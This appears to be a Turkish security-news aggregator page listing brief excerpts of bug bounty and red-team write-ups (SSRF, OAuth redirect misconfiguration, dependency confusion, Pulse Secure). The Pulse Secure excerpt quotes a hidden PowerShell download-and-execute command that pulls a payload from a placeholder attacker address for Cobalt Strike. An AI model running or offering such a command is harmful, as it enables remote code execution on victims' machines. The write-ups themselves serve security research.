Kategori: Mix

24
Kas
2024

[Google VRP] Google Cloud Platform StackDriver’da SSRF – Ron Chan

Bu harika blog yazısını okuduktan sonra GAE’yi test etme süreci sırasında, Google Cloud Platform Stackdriver’da bir hata ayıklama uygulaması buldum;…

24
Kas
2024

Redteaming için Pulse Secure’u Hacklemek

Toplu komut dosyası için kullandığımız kod aşağıdadır. @echo off powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://your-ip/payload))” Cobalt Strike’ı kurma…

24
Kas
2024

‘std::process::Command’ toplu iş dosyaları bağımsız değişkeninden kaçış, sondaki boşluk veya noktalarla atlanabilir

Internet Bug Bounty, 4xpl0r3r tarafından gönderilen bir hatayı açıkladı: https://hackerone.com/reports/2721478 – Ödül: 505 $ Source link

24
Kas
2024

Ön Görüş Aynası: 2025 Sürümü

.bh__table, .bh__table_header, .bh__table_cell { border: 1px katı #C0C0C0; } .bh__table_cell { dolgu: 5px; arka plan rengi: #FFFFFF; } .bh__table_cell p…

24
Kas
2024

DEFCON vlog + promosyon kampanyası

DEFCON vlog + promosyon kampanyası Source link

24
Kas
2024

OAuth ve Mesaj Mesajı | surajdisoja.me

Tl;dr: Bir OAuth yanlış yapılandırması keşfedildi redirect_uri https://app.target.com/oauth/authorize adresindeki hedefin OAuth IDP’sinde bulunan parametre, saldırganların ../ karakterler. Bu sorun, farklı…

24
Kas
2024

Google’ın Mobil VRP’si Kristoffer Blasiak ile Kamera Arkası (Hextree Podcast Ep.1)

Google’ın Mobil VRP’si Kristoffer Blasiak ile Kamera Arkası (Hextree Podcast Ep.1) Source link

24
Kas
2024

Doğrusal Regresyon için animasyonlu kılavuz

Doğrusal Regresyon için animasyonlu kılavuz Source link

24
Kas
2024

0’dan $$$$’a – EN BÜYÜK HATA ÖDÜLÜ ÖĞRENMELERİM!

0’dan $$$$’a – EN BÜYÜK HATA ÖDÜLÜ ÖĞRENMELERİM! Source link

24
Kas
2024

Bağımlılık Karışıklığı: Apple’a, Microsoft’a ve Düzinelerce Diğer Şirkete Nasıl Girdim | kaydeden Alex Birsan

Hem dahili sunuculara hem de bireysel geliştiricilerin bilgisayarlarına kurulan npm paketleriyle ilgili aynı tema, diğer şirketlere yönelik diğer birçok başarılı…

24
Kas
2024

Instagram Uygulama Erişim Jetonu – Bunlar aradığınız erişim_tokenleri değil

Geliştirici belgelerinde tanımlandığı şekliyle Facebook Graph API’sinde, çeşitli API uç noktalarında kimlik doğrulaması yapmak için çeşitli erişim belirteçleri vardır. Kullanıcı…

24
Kas
2024

Hata Ödül Avcıları için Bugcrowd Araştırmacısı Şablonları

Hata Ödül Avcıları için Bugcrowd Araştırmacısı Şablonları Source link